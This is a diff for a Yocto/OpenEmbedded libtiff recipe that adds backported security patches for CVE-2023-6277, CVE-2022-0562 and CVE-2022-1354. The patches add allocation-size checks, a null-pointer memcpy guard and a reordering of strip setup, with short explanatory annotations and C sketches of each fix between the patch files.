diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
new file mode 100644
index 0000000000..e955b3f2e4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
@@ -0,0 +1,191 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . included inttypes.h header to support PRIu32 and PRIu64;
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+ . calls to the size check, which is the idea of the patch, were added before
+ _TIFFCheckMalloc and may not match the original patch methods;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 5320c9d89c054fa805d037d84c57da874470b01a Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 31 Oct 2023 15:43:29 +0000
+Subject: [PATCH] Prevent some out-of-memory attacks
+
+Some small fuzzer files fake large amounts of data and provoke out-of-memory situations. For non-compressed data content / tags, out-of-memory can be prevented by comparing with the file size.
+
+At image reading, data size of some tags / data structures (StripByteCounts, StripOffsets, StripArray, TIFF directory) is compared with file size to prevent provoked out-of-memory attacks.
+
+See issue https://gitlab.com/libtiff/libtiff/-/issues/614#note_1602683857
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-1.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/5320c9d89c054fa805d037d84c57da874470b01a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 92 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 90 insertions(+), 2 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -37,6 +37,7 @@
+ #include "tiffiop.h"
+ #include <float.h>
+ #include <stdlib.h>
++#include <inttypes.h>
+
+ #define FAILED_FII ((uint32) -1)
+
+@@ -863,6 +864,21 @@ static enum TIFFReadDirEntryErr TIFFRead
+ datasize=(*count)*typesize;
+ assert((tmsize_t)datasize>0);
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of requested memory is not greater than file size.
++ */
++ uint64 filesize = TIFFGetFileSize(tif);
++ if (datasize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++ "Requested memory size for tag %d (0x%x) %" PRIu32
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, tag not read",
++ direntry->tdir_tag, direntry->tdir_tag, datasize,
++ filesize);
++ return (TIFFReadDirEntryErrAlloc);
++ }
++
+ if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+ return TIFFReadDirEntryErrIo;
+
+@@ -4534,6 +4550,20 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ if( !_TIFFFillStrilesInternal( tif, 0 ) )
+ return -1;
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Requested memory size for StripByteCounts of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return -1;
++ }
++
+ if (td->td_stripbytecount_p)
+ _TIFFfree(td->td_stripbytecount_p);
+ td->td_stripbytecount_p = (uint64*)
+@@ -4544,9 +4574,7 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+
+ if (td->td_compression != COMPRESSION_NONE) {
+ uint64 space;
+- uint64 filesize;
+ uint16 n;
+- filesize = TIFFGetFileSize(tif);
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+ space=sizeof(TIFFHeaderClassic)+2+dircount*12+4;
+ else
+@@ -4854,6 +4882,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
+ if (origdir == NULL)
+@@ -4957,6 +4999,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ "Sanity check on directory count failed, zero tag directories not supported");
+ return 0;
+ }
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize,
+ "to read TIFF directory");
+@@ -5000,6 +5056,8 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ }
+ }
+ }
++ /* No check against filesize needed here because "dir" should have same size
++ * than "origdir" checked above. */
+ dir = (TIFFDirEntry*)_TIFFCheckMalloc(tif, dircount16,
+ sizeof(TIFFDirEntry),
+ "to read TIFF directory");
+@@ -5769,7 +5827,20 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ _TIFFfree(data);
+ return(0);
+ }
+-
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Requested memory size for StripArray of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ _TIFFfree(data);
++ return (0);
++ }
+ resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ if (resizeddata==0) {
+ _TIFFfree(data);
+@@ -5865,6 +5936,23 @@ static void allocChoppedUpStripArrays(TI
+ }
+ bytecount = last_offset + last_bytecount - offset;
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of StripByteCount and StripOffset tags is not greater than
++ * file size.
++ */
++ uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++ uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++ "Requested memory size for StripByteCount and "
++ "StripOffsets %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return;
++ }
++
+ newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
+ "for chopped \"StripByteCounts\" array");
+ newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
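The recurring pattern in these hunks: when an allocation size is derived from counts read out of the file (strip counts, directory entry counts), compare it against the file size first, since uncompressed metadata cannot legitimately need more bytes than the file contains. A minimal sketch of that guard; bounded_alloc() is an invented helper and filesize is passed in rather than obtained via TIFFGetFileSize():

    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>

    /* Allocate count * elem_size bytes only if the file could actually
     * back that much data; otherwise refuse the request. */
    static void *bounded_alloc(uint64_t count, uint64_t elem_size,
                               uint64_t filesize)
    {
        uint64_t want;

        if (elem_size != 0 && count > UINT64_MAX / elem_size)
            return NULL;                       /* request itself overflows */
        want = count * elem_size;
        if (want > filesize || want > SIZE_MAX)
            return NULL;                       /* bigger than the file: bogus */
        return malloc((size_t)want);
    }

    int main(void)
    {
        /* A 4 KiB file claiming one million 8-byte strip offsets is corrupt. */
        void *p = bounded_alloc(1000000, sizeof(uint64_t), 4096);
        printf(p == NULL ? "allocation refused\n" : "allocated\n");
        free(p);
        return 0;
    }
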
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
new file mode 100644
index 0000000000..644b3fdb3f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
@@ -0,0 +1,152 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 0b025324711213a75e38b52f7e7ba60235f108aa Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 19:47:22 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Ammends 5320c9d89c054fa805d037d84c57da874470b01a
+
+This fixes a performance regression caught by the GDAL regression test
+suite.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-2.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/0b025324711213a75e38b52f7e7ba60235f108aa]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 83 +++++++++++++++++++++++++------------------
+ 1 file changed, 48 insertions(+), 35 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -864,19 +864,22 @@ static enum TIFFReadDirEntryErr TIFFRead
+ datasize=(*count)*typesize;
+ assert((tmsize_t)datasize>0);
+
+- /* Before allocating a huge amount of memory for corrupted files, check if
+- * size of requested memory is not greater than file size.
+- */
+- uint64 filesize = TIFFGetFileSize(tif);
+- if (datasize > filesize)
++ if (datasize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
+- "Requested memory size for tag %d (0x%x) %" PRIu32
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated, tag not read",
+- direntry->tdir_tag, direntry->tdir_tag, datasize,
+- filesize);
+- return (TIFFReadDirEntryErrAlloc);
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (datasize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++ "Requested memory size for tag %d (0x%x) %" PRIu32
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated, tag not read",
++ direntry->tdir_tag, direntry->tdir_tag, datasize,
++ filesize);
++ return (TIFFReadDirEntryErrAlloc);
++ }
+ }
+
+ if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+@@ -4550,18 +4553,22 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ if( !_TIFFFillStrilesInternal( tif, 0 ) )
+ return -1;
+
+- /* Before allocating a huge amount of memory for corrupted files, check if
+- * size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++ uint64 filesize = 0;
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, module,
+- "Requested memory size for StripByteCounts of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- return -1;
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for StripByteCounts of %" PRIu64
++ " is greater than filesize %" PRIu64 ". Memory not allocated",
++ allocsize, filesize);
++ return -1;
++ }
+ }
+
+ if (td->td_stripbytecount_p)
+@@ -4608,11 +4615,13 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ return -1;
+ space+=datasize;
+ }
++ if (filesize == 0)
++ filesize = TIFFGetFileSize(tif);
+ if( filesize < space )
+- /* we should perhaps return in error ? */
+- space = filesize;
+- else
+- space = filesize - space;
++ /* we should perhaps return in error ? */
++ space = filesize;
++ else
++ space = filesize - space;
+ if (td->td_planarconfig == PLANARCONFIG_SEPARATE)
+ space /= td->td_samplesperpixel;
+ for (strip = 0; strip < td->td_nstrips; strip++)
+@@ -4882,19 +4891,23 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
+- /* Before allocating a huge amount of memory for corrupted files, check
+- * if size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)dircount16 * dirsize;
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(
+- tif->tif_clientdata, module,
+- "Requested memory size for TIFF directory of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated, TIFF directory not read",
+- allocsize, filesize);
+- return 0;
++ /* Before allocating a huge amount of memory for corrupted files,
++ * check if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
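This follow-up only pays for the file-size lookup when the request exceeds a 100 MB threshold, since small allocations cannot cause the out-of-memory condition and probing the size on every tag read caused the GDAL performance regression mentioned above. A sketch of the refined check; file_size_slow() is a stand-in for TIFFGetFileSize():

    #include <stdint.h>
    #include <stdio.h>

    #define BIG_ALLOC_THRESHOLD (100ull * 1024 * 1024)   /* 100 MB, as upstream */

    /* Stand-in for TIFFGetFileSize(); in libtiff this goes through the
     * I/O layer and is assumed to be comparatively expensive. */
    static uint64_t file_size_slow(void)
    {
        return 4096;                        /* pretend the input is 4 KiB */
    }

    /* Accept small requests outright; only large ones pay for the
     * file-size probe, matching the CVE-2023-6277 follow-up. */
    static int allocation_plausible(uint64_t want)
    {
        if (want <= BIG_ALLOC_THRESHOLD)
            return 1;                       /* cheap path: no probe */
        return want <= file_size_slow();    /* big request must fit the file */
    }

    int main(void)
    {
        printf("64 KiB request: %d\n", allocation_plausible(64 * 1024));
        printf("2 GiB request:  %d\n", allocation_plausible(2ull << 30));
        return 0;
    }
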
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
new file mode 100644
index 0000000000..ed7d7e7b96
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
@@ -0,0 +1,46 @@
+Backport of:
+
+From de7bfd7d4377c266f81849579f696fa1ad5ba6c3 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 20:13:45 +0100
+Subject: [PATCH] TIFFFetchDirectory(): remove useless allocsize vs filesize
+ check
+
+CoverityScan rightly points that the max value for dircount16 * dirsize
+is 4096 * 20. That's small enough not to do any check
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-3.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/de7bfd7d4377c266f81849579f696fa1ad5ba6c3]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 18 ------------------
+ 1 file changed, 18 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -4891,24 +4891,6 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
+- const uint64 allocsize = (uint64)dircount16 * dirsize;
+- if (allocsize > 100 * 1024 * 1024)
+- {
+- /* Before allocating a huge amount of memory for corrupted files,
+- * check if size of requested memory is not greater than file size.
+- */
+- const uint64 filesize = TIFFGetFileSize(tif);
+- if (allocsize > filesize)
+- {
+- TIFFWarningExt(
+- tif->tif_clientdata, module,
+- "Requested memory size for TIFF directory of %" PRIu64
+- " is greater than filesize %" PRIu64
+- ". Memory not allocated, TIFF directory not read",
+- allocsize, filesize);
+- return 0;
+- }
+- }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
+ if (origdir == NULL)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
new file mode 100644
index 0000000000..1a43fd3230
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
@@ -0,0 +1,94 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From dbb825a8312f30e63a06c272010967d51af5c35a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 21:30:58 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-4.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/dbb825a8312f30e63a06c272010967d51af5c35a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 54 +++++++++++++++++++++++++------------------
+ 1 file changed, 31 insertions(+), 23 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -5822,19 +5822,24 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ _TIFFfree(data);
+ return(0);
+ }
+- /* Before allocating a huge amount of memory for corrupted files, check
+- * if size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)nstrips * sizeof(uint64);
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, module,
+- "Requested memory size for StripArray of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- _TIFFfree(data);
+- return (0);
++ /* Before allocating a huge amount of memory for corrupted files,
++ * check if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for StripArray of %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ _TIFFfree(data);
++ return (0);
++ }
+ }
+ resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ if (resizeddata==0) {
+@@ -5935,17 +5940,20 @@ static void allocChoppedUpStripArrays(TI
+ * size of StripByteCount and StripOffset tags is not greater than
+ * file size.
+ */
+- uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
+- uint64 filesize = TIFFGetFileSize(tif);
+- if (allocsize > filesize)
+- {
+- TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
+- "Requested memory size for StripByteCount and "
+- "StripOffsets %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- return;
++ const uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++ if (allocsize > 100 * 1024 * 1024)
++ {
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++ "Requested memory size for StripByteCount and "
++ "StripOffsets %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return;
++ }
+ }
+
+ newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
diff --git a/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
new file mode 100644
index 0000000000..01ed5dcd24
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
@@ -0,0 +1,28 @@
+From 561599c99f987dc32ae110370cfdd7df7975586b Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 5 Feb 2022 20:36:41 +0100
+Subject: [PATCH] TIFFReadDirectory(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0562
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 2bbc4585..23194ced 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -4126,7 +4126,8 @@
+ goto bad;
+ }
+
+- memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
++ if (old_extrasamples > 0)
++ memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
+ _TIFFsetShortArray(&tif->tif_dir.td_sampleinfo, new_sampleinfo, tif->tif_dir.td_extrasamples);
+ _TIFFfree(new_sampleinfo);
+ }
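Passing a null source to memcpy() is undefined behaviour even when the length is zero, which is exactly the case when old_extrasamples is 0 and the sample-info array was never allocated. A tiny sketch of the guarded copy (copy_sampleinfo() is an invented name, not libtiff API):

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    /* Copy 'count' uint16 samples, tolerating the (src == NULL, count == 0)
     * combination that would be UB if handed straight to memcpy(). */
    static void copy_sampleinfo(uint16_t *dst, const uint16_t *src, size_t count)
    {
        if (count > 0)
            memcpy(dst, src, count * sizeof(uint16_t));
    }

    int main(void)
    {
        uint16_t dst[4] = {0};
        copy_sampleinfo(dst, NULL, 0);     /* safe no-op instead of UB */
        printf("%u\n", dst[0]);
        return 0;
    }
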
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
new file mode 100644
index 0000000000..71b85cac10
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
@@ -0,0 +1,212 @@
+From 87881e093691a35c60b91cafed058ba2dd5d9807 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 5 Dec 2021 14:37:46 +0100
+Subject: [PATCH] TIFFReadDirectory: fix OJPEG hack (fixes #319)
+
+to avoid having the size of the strip arrays inconsistent with the
+number of strips returned by TIFFNumberOfStrips(), which may cause
+out-of-bounds array read afterwards.
+
+One of the OJPEG hack that alters SamplesPerPixel may influence the
+number of strips. Hence compute tif_dir.td_nstrips only afterwards.
+
+CVE: CVE-2022-1354
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/87f580f39011109b3bb5f6eca13fac543a542798]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ libtiff/tif_dirread.c | 162 ++++++++++++++++++++++--------------------
+ 1 file changed, 83 insertions(+), 79 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 8f434ef5..14c031d1 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -3794,50 +3794,7 @@ TIFFReadDirectory(TIFF* tif)
+ MissingRequired(tif,"ImageLength");
+ goto bad;
+ }
+- /*
+- * Setup appropriate structures (by strip or by tile)
+- */
+- if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
+- tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
+- tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
+- tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
+- tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
+- tif->tif_flags &= ~TIFF_ISTILED;
+- } else {
+- tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
+- tif->tif_flags |= TIFF_ISTILED;
+- }
+- if (!tif->tif_dir.td_nstrips) {
+- TIFFErrorExt(tif->tif_clientdata, module,
+- "Cannot handle zero number of %s",
+- isTiled(tif) ? "tiles" : "strips");
+- goto bad;
+- }
+- tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
+- if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
+- tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
+- if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
+-#ifdef OJPEG_SUPPORT
+- if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
+- (isTiled(tif)==0) &&
+- (tif->tif_dir.td_nstrips==1)) {
+- /*
+- * XXX: OJPEG hack.
+- * If a) compression is OJPEG, b) it's not a tiled TIFF,
+- * and c) the number of strips is 1,
+- * then we tolerate the absence of stripoffsets tag,
+- * because, presumably, all required data is in the
+- * JpegInterchangeFormat stream.
+- */
+- TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
+- } else
+-#endif
+- {
+- MissingRequired(tif,
+- isTiled(tif) ? "TileOffsets" : "StripOffsets");
+- goto bad;
+- }
+- }
++
+ /*
+ * Second pass: extract other information.
+ */
+@@ -4042,41 +3999,6 @@ TIFFReadDirectory(TIFF* tif)
+ } /* -- if (!dp->tdir_ignore) */
+ } /* -- for-loop -- */
+
+- if( tif->tif_mode == O_RDWR &&
+- tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
+- {
+- /* Directory typically created with TIFFDeferStrileArrayWriting() */
+- TIFFSetupStrips(tif);
+- }
+- else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
+- {
+- if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
+- {
+- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
+- tif->tif_dir.td_nstrips,
+- &tif->tif_dir.td_stripoffset_p))
+- {
+- goto bad;
+- }
+- }
+- if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
+- {
+- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
+- tif->tif_dir.td_nstrips,
+- &tif->tif_dir.td_stripbytecount_p))
+- {
+- goto bad;
+- }
+- }
+- }
+-
+ /*
+ * OJPEG hack:
+ * - If a) compression is OJPEG, and b) photometric tag is missing,
+@@ -4147,6 +4069,88 @@ TIFFReadDirectory(TIFF* tif)
+ }
+ }
+
++ /*
++ * Setup appropriate structures (by strip or by tile)
++ * We do that only after the above OJPEG hack which alters SamplesPerPixel
++ * and thus influences the number of strips in the separate planarconfig.
++ */
++ if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
++ tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
++ tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
++ tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
++ tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
++ tif->tif_flags &= ~TIFF_ISTILED;
++ } else {
